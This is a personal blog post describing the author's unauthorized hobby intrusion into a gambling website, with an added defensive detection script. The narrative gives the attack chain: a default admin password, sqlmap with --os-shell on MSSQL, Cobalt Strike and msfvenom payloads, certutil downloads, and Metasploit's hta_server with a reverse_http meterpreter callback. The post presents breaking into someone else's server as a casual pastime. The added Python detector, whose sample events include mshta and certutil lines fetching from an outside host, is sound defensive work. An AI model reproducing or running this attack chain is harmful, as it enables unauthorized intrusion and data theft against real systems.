By the way
In the blink of an eye it is already 2025 and the Spring Festival is almost here. It has been nearly five years since my last article on fb. I had wanted to write a series of articles but gave up halfway (it can't even be called halfway; "started, then gave up" is more accurate - -!). Recently I suddenly felt like writing something again, but I don't have a public account, so I thought of fb once more.
After three years of wearing masks, a lot has happened:
- The company is laying people off, cutting salaries and trimming benefits, and the layoffs keep coming. It hasn't reached me yet, but it is probably only a matter of time. I have thought about changing jobs but haven't made a decision.
- Myanmar A is even harder to put into words, sigh
- Even more heartbreaking, the person I like has found a partner. Normally, since she already has someone, I should quietly step away, but we work at the same company and see each other every day; maybe liking her was a mistake from the start~
- Every time I talk to my family it comes down to three things: find a partner, find a partner, and, again, find a partner

During the day I can bury myself in work and not think too much. After work in the evening, being alone in the flat is the hardest part, so I have to find things to do: games, films, TV series, courses... and so on. When all of that got boring, there was this unsuccessful penetration...
Main content
CS online
A certain gambling site
Tried weak passwords; it didn't take much effort, admin/123456. The administrator's security awareness can't be very high.
Ah, is all of this test data???
There was nothing useful in the backend, but the gambling-site template's login has SQL injection (there is an article about it on this site), so I went straight to sqlmap:
sqlmap -r sql.txt
SQL injection confirmed. I was already in the backend, so there was no need to look at the data; I added the --os-shell parameter directly:
sqlmap -r sql.txt --dbms mssql --os-shell
Used CS for fileless upload, also following the articles on this site.
Execute this command in the os-shell
Check the system information: a host at some cloud provider
No domain
Check the files
First download the Web.config, it may be useful...
Privilege Escalation (Failed)
All the privilege escalation methods built into CS failed; the patches were quite complete...
The web.config contains the database sa password, but privilege escalation through it failed as well.
I thought of putting it into msf to give it a try (it seems a CS session can be spawned to msf directly here, but I hadn't used that, so I went with the traditional method).
First, check the process list for anti-virus software or similar through an online identification tool
I looked it up online and there should be no impact
Upload the backdoor generated by msfvenom
It looks like it uploaded successfully with no error message, but was it killed?
Uploaded something random, still 0
It seems uploads are simply not allowed, but there is no error prompt
Try using certutil to download a remote file
There is definitely enough disk space, but it can't download, which should be a policy or permission issue.
Later, I found out that msf also supports fileless upload.
use exploit/windows/misc/hta_server
set payload windows/meterpreter/reverse_http
set lhost ip
set lport
exploit -j
A link address will be generated for mshta to access
In fact, this penetration is over. The msf built-in modules also failed to escalate privileges, so I left; it couldn't be escalated. I made no record of all the failures.
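Seen from the defender's side, the chain above leaves a distinctive trail in process-creation telemetry: a shell spawned by sqlservr.exe (what sqlmap's --os-shell drives on MSSQL through xp_cmdshell), mshta.exe launched with a remote URL for the fileless stager, and certutil.exe used as a downloader. The following is an added example, not part of the original write-up, that flags those three patterns over constructed Sysmon-style events; the field names, paths and sample values are assumptions.

```python
import ntpath
import re

# Constructed Sysmon-style process-creation events (not real logs); the
# field names are an assumption and the values are illustrative only.
EVENTS = [
    {"parent": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://198.51.100.7:8080/stage.hta"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://198.51.100.7/a.exe a.exe"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -hashfile setup.msi SHA256"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
SHELLS = {"cmd.exe", "powershell.exe"}

def base(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()

def classify(event: dict) -> list[str]:
    """Return the names of every rule the event triggers."""
    hits = []
    image, parent, cmd = base(event["image"]), base(event["parent"]), event["cmdline"]
    # xp_cmdshell runs commands as children of the SQL Server service process.
    if parent == "sqlservr.exe" and image in SHELLS:
        hits.append("mssql_spawned_shell")
    # mshta fetching an HTA over HTTP is the fileless stager pattern.
    if image == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_hta")
    # certutil with -urlcache plus a URL is a download, not a certificate task.
    if image == "certutil.exe" and "-urlcache" in cmd.lower() and URL_RE.search(cmd):
        hits.append("certutil_download")
    return hits

def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map event index -> triggered rules, leaving out benign events."""
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}

if __name__ == "__main__":
    for idx, rules in scan(EVENTS).items():
        print(idx, EVENTS[idx]["cmdline"], "->", ", ".join(rules))
```

The last two events are benign controls: a notepad launch and a legitimate certutil hash check, neither of which should match.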
Summary
- Breaking into the target's web side was very simple; after all, there were existing vulnerabilities.
- Where file upload and download are restricted, the target can still be handled with fileless techniques (I later tried writing files directly and that also worked).
- For Windows privilege escalation I am too inexperienced and need more practice.
- This target could still be poked at a bit more: nmap also found some other services, and the file section was not checked thoroughly. But I no longer have the heart for it, it's too tiring. I work during the day and deal with this at night. Although there isn't much here, it was fiddled with back and forth, and it took almost three nights to write this article.
- I am not a full-time penetration tester, so my skills are inevitably lacking. I hope the experts can give some pointers on the weak parts.